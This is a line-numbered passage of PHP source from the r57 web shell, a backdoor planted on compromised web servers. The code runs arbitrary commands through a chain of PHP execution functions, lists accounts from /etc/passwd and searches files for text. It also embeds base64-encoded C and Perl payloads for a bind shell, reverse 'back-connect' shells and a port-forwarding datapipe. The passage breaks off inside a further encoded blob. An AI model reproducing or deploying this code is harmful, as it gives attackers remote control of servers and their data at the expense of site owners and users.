1235. 'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt',
1236. '----------------------------------------------------------------------------------------------------'=>'ls -la'
1237. );
1238. $table_up1  = "<tr><td bgcolor=#000000><font face=Verdana size=-2><b><div align=center>:: ";
1239. $table_up2  = " ::</div></b></font></td></tr><tr><td>";
1240. $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000>";
1241. $table_end1 = "</td></tr>";
1242. $arrow = " <font face=Webdings color=gray>4</font>";
1243. $lb = "<font color=black>[</font>";
1244. $rb = "<font color=black>]</font>";
1245. $font = "<font face=Verdana size=-2>";
1246. $ts = "<table class=table1 width=100% align=center>";
1247. $te = "</table>";
1248. $fs = "<form name=form method=POST>";
1249. $fe = "</form>";
1250.  
1251. if(isset($_GET['users']))
1252.  {
1253.  if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
1254.  else
1255.   {
1256.   echo '<center>';
1257.   foreach($users as $user) { echo $user."<br>"; }
1258.   echo '</center>';
1259.   }
1260.  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1261.  }
1262.  
1263. if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
1264. if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
1265. $unix = 0;
1266. if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
1267. if(empty($dir))
1268.  {
1269.  $os = getenv('OS');
1270.  if(empty($os)){ $os = @php_uname(); }
1271.  if(empty($os)){ $os ="-"; $unix=1; }
1272.  else
1273.     {
1274.     if(@eregi("^win",$os)) { $unix = 0; }
1275.     else { $unix = 1; }
1276.     }
1277.  }
1278.  
1279. if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
1280.   {
1281.     echo $head;
1282.     if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
1283.     else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
1284.     $sr->SearchText(0,0);
1285.     $res = $sr->GetResultFiles();
1286.     $found = $sr->GetMatchesCount();
1287.     $titles = $sr->GetTitles();
1288.     $r = "";
1289.     if($found > 0)
1290.     {
1291.       $r .= "<TABLE width=100%>";
1292.       foreach($res as $file=>$v)
1293.       {
1294.         $r .= "<TR>";
1295.         $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
1296.         $r .= (!$unix)? str_replace("/","\\",$file) : $file;
1297.         $r .= "</b></font></ TD>";
1298.         $r .= "</TR>";
1299.         foreach($v as $a=>$b)
1300.         {
1301.           $r .= "<TR>";
1302.           $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
1303.           $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
1304.           $r .= "</TR>\n";
1305.         }
1306.       }
1307.       $r .= "</TABLE>";
1308.     echo $r;
1309.     }
1310.     else
1311.     {
1312.       echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
1313.     }
1314.   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1315.   die();
1316.   }                                                          
1317.  
1318. if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
1319. $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
1320. if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
1321. function ws($i)
1322. {
1323. return @str_repeat("&nbsp;",$i);
1324. }
1325. function ex($cfe)
1326. {
1327.  $res = '';
1328.  if (!empty($cfe))
1329.  {
1330.   if(@function_exists('exec'))
1331.    {
1332.     @exec($cfe,$res);
1333.     $res = join("\n",$res);
1334.    }
1335.   elseif(@function_exists('shell_exec'))
1336.    {
1337.     $res = @shell_exec($cfe);
1338.    }
1339.   elseif(@function_exists('system'))
1340.    {
1341.     @ob_start();
1342.     @system($cfe);
1343.     $res = @ob_get_contents();
1344.     @ob_end_clean();
1345.    }
1346.   elseif(@function_exists('passthru'))
1347.    {
1348.     @ob_start();
1349.     @passthru($cfe);
1350.     $res = @ob_get_contents();
1351.     @ob_end_clean();
1352.    }
1353.   elseif(@is_resource($f = @popen($cfe,"r")))
1354.   {
1355.    $res = "";
1356.    if(@function_exists('fread') && @function_exists('feof')){
1357.     while(!@feof($f)) { $res .= @fread($f,1024); }
1358.    }else if(@function_exists('fgets') && @function_exists('feof')){
1359.     while(!@feof($f)) { $res .= @fgets($f,1024); }
1360.    }
1361.    @pclose($f);
1362.   }
1363.   elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
1364.   {
1365.    $res = "";
1366.    if(@function_exists('fread') && @function_exists('feof')){
1367.     while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
1368.    }else if(@function_exists('fgets') && @function_exists('feof')){
1369.     while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
1370.    }
1371.    @proc_close($f);
1372.   }
1373.   elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))
1374.    {
1375.     $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
1376.     $pid = @pcntl_fork();
1377.     if ($pid == -1) {
1378.      $res .= '[-] Could not children fork. Exit';
1379.     } else if ($pid) {
1380.          if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
1381.          else {$res .= '[-] Error. Command incorrect.';}
1382.     } else {
1383.          $cfe = array(" -e 'system(\"$cfe\")'");
1384.          if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
1385.          if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
1386.          die();
1387.     }
1388.    }
1389.  }
1390.  return $res;
1391. }
1392. function get_users($filename)
1393. {
1394.   $users = array();
1395.   $rows=@explode("\n",readzlib($filename));
1396.   if(!$rows) return 0;
1397.   foreach ($rows as $string)
1398.    {
1399.    $user = @explode(":",trim($string));
1400.    if(substr($string,0,1)!='#') array_push($users,$user[0]);
1401.    }
1402.   return $users;
1403. }
1404. function err($n,$txt='')
1405. {
1406. echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';
1407. echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
1408. if(!empty($txt)) { echo " $txt"; }
1409. echo '</b></div></font></td></tr></table>';
1410. return null;
1411. }
1412. function perms($mode)
1413. {
1414. if (!$GLOBALS['unix']) return 0;
1415. if( $mode & 0x1000 ) { $type='p'; }
1416. else if( $mode & 0x2000 ) { $type='c'; }
1417. else if( $mode & 0x4000 ) { $type='d'; }
1418. else if( $mode & 0x6000 ) { $type='b'; }
1419. else if( $mode & 0x8000 ) { $type='-'; }
1420. else if( $mode & 0xA000 ) { $type='l'; }
1421. else if( $mode & 0xC000 ) { $type='s'; }
1422. else $type='u';
1423. $owner["read"] = ($mode & 00400) ? 'r' : '-';
1424. $owner["write"] = ($mode & 00200) ? 'w' : '-';
1425. $owner["execute"] = ($mode & 00100) ? 'x' : '-';
1426. $group["read"] = ($mode & 00040) ? 'r' : '-';
1427. $group["write"] = ($mode & 00020) ? 'w' : '-';
1428. $group["execute"] = ($mode & 00010) ? 'x' : '-';
1429. $world["read"] = ($mode & 00004) ? 'r' : '-';
1430. $world["write"] = ($mode & 00002) ? 'w' : '-';
1431. $world["execute"] = ($mode & 00001) ? 'x' : '-';
1432. if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
1433. if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
1434. if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
1435. $s=sprintf("%1s", $type);
1436. $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
1437. $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
1438. $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
1439. return trim($s);
1440. }
1441. function in($type,$name,$size,$value,$checked=0)
1442. {
1443.  $ret = "<input type=".$type." name=".$name." ";
1444.  if($size != 0) { $ret .= "size=".$size." "; }
1445.  $ret .= "value=\"".$value."\"";
1446.  if($checked) $ret .= " checked";
1447.  return $ret.">";
1448. }
1449. function which($pr)
1450. {
1451. $path = '';
1452. $path = ex("which $pr");
1453. if(!empty($path)) { return $path; } else { return false; }
1454. }
1455. function cf($fname,$text)
1456. {
1457.  $w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);
1458.  if($w_file)
1459.  {
1460.  @fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
1461.  @fclose($w_file);
1462.  }
1463. }
1464. function sr($l,$t1,$t2)
1465.  {
1466.  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1467.  }
1468. if (!@function_exists("view_size"))
1469. {
1470. function view_size($size)
1471. {
1472.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
1473.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
1474.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
1475.  else {$size = $size . " B";}
1476.  return $size;
1477. }
1478. }
1479.   function DirFilesR($dir,$types='')
1480.   {
1481.     $files = Array();
1482.     if(($handle = @opendir($dir)) || (@function_exists('scandir')))
1483.     {
1484.       while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir))))
1485.       {
1486.         if ($file != "." && $file != "..")
1487.         {
1488.           if(@is_dir($dir."/".$file))
1489.             $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1490.           else
1491.           {
1492.             $pos = @strrpos($file,".");
1493.             $ext = @substr($file,$pos,@strlen($file)-$pos);
1494.             if($types)
1495.             {
1496.               if(@in_array($ext,explode(';',$types)))
1497.                 $files[] = $dir."/".$file;
1498.             }
1499.             else
1500.               $files[] = $dir."/".$file;
1501.           }
1502.         }
1503.       }
1504.       @closedir($handle);
1505.     }
1506.     return $files;
1507.   }
1508.   class SearchResult
1509.   {
1510.     var $text;
1511.     var $FilesToSearch;
1512.     var $ResultFiles;
1513.     var $FilesTotal;
1514.     var $MatchesCount;
1515.     var $FileMatschesCount;
1516.     var $TimeStart;
1517.     var $TimeTotal;
1518.     var $titles;
1519.     function SearchResult($dir,$text,$filter='')
1520.     {
1521.       $dirs = @explode(";",$dir);
1522.       $this->FilesToSearch = Array();
1523.       for($a=0;$a<count($dirs);$a++)
1524.         $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1525.       $this->text = $text;
1526.       $this->FilesTotal = @count($this->FilesToSearch);
1527.       $this->TimeStart = getmicrotime();
1528.       $this->MatchesCount = 0;
1529.       $this->ResultFiles = Array();
1530.       $this->FileMatchesCount = Array();
1531.       $this->titles = Array();
1532.     }
1533.     function GetFilesTotal() { return $this->FilesTotal; }
1534.     function GetTitles() { return $this->titles; }
1535.     function GetTimeTotal() { return $this->TimeTotal; }
1536.     function GetMatchesCount() { return $this->MatchesCount; }
1537.     function GetFileMatchesCount() { return $this->FileMatchesCount; }
1538.     function GetResultFiles() { return $this->ResultFiles; }
1539.     function SearchText($phrase=0,$case=0) {
1540.     $qq = @explode(' ',$this->text);
1541.     $delim = '|';
1542.       if($phrase)
1543.         foreach($qq as $k=>$v)
1544.           $qq[$k] = '\b'.$v.'\b';
1545.       $words = '('.@implode($delim,$qq).')';
1546.       $pattern = "/".$words."/";
1547.       if(!$case)
1548.         $pattern .= 'i';
1549.       foreach($this->FilesToSearch as $k=>$filename)
1550.       {
1551.         $this->FileMatchesCount[$filename] = 0;
1552.         $FileStrings = @file($filename) or @next;
1553.         for($a=0;$a<@count($FileStrings);$a++)
1554.         {
1555.           $count = 0;
1556.           $CurString = $FileStrings[$a];
1557.           $CurString = @Trim($CurString);
1558.           $CurString = @strip_tags($CurString);
1559.           $aa = '';
1560.           if(($count = @preg_match_all($pattern,$CurString,$aa)))
1561.           {
1562.             $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1563.             $this->ResultFiles[$filename][$a+1] = $CurString;
1564.             $this->MatchesCount += $count;
1565.             $this->FileMatchesCount[$filename] += $count;
1566.           }
1567.         }
1568.       }
1569.       $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1570.     }
1571.   }
1572.   function getmicrotime()
1573.   {
1574.     list($usec,$sec) = @explode(" ",@microtime());
1575.     return ((float)$usec + (float)$sec);
1576.   }
1577. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1578. A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1579. GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1580. b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1581. pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1582. NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1583. ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1584. ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
1585. 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
1586. 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
1587. 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1588. dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1589. lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1590. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1591. VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1592. JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1593. TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1594. lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1595. Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1596. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1597. lIENPTk47DQpleGl0IDA7DQp9DQp9";
1598. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1599. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1600. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1601. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1602. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1603. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1604. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1605. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1606. BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1607. SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1608. KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1609. sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1610. Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1611. QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1612. Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1613. $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1614. x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1615. HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1616. aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1617. lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1618. xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1619. W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1620. LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1621. udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
1622. 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1623. iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1624. KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1625. gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1626. hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1627. iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1628. ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1629. vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1630. AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1631. QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1632. ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1633. gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1634. wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
1635. 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1636. MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1637. gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
1638. 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1639. HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1640. dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1641. KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1642. ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1643. E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1644. Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1645. NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1646. J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1647. CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1648. dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1649. gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1650. lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1651. $datapipe_pm="c2Vzc2lvbl9zdGFydCgpOw0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ2JhamFrJ10pKQl7DQoJJHZpc2l0Y291bnQgPSAwOw0KCSR3Z
1652. WIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQoJJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KCSRib2R5ID0gImFkYSB5YW5nIGluamVj
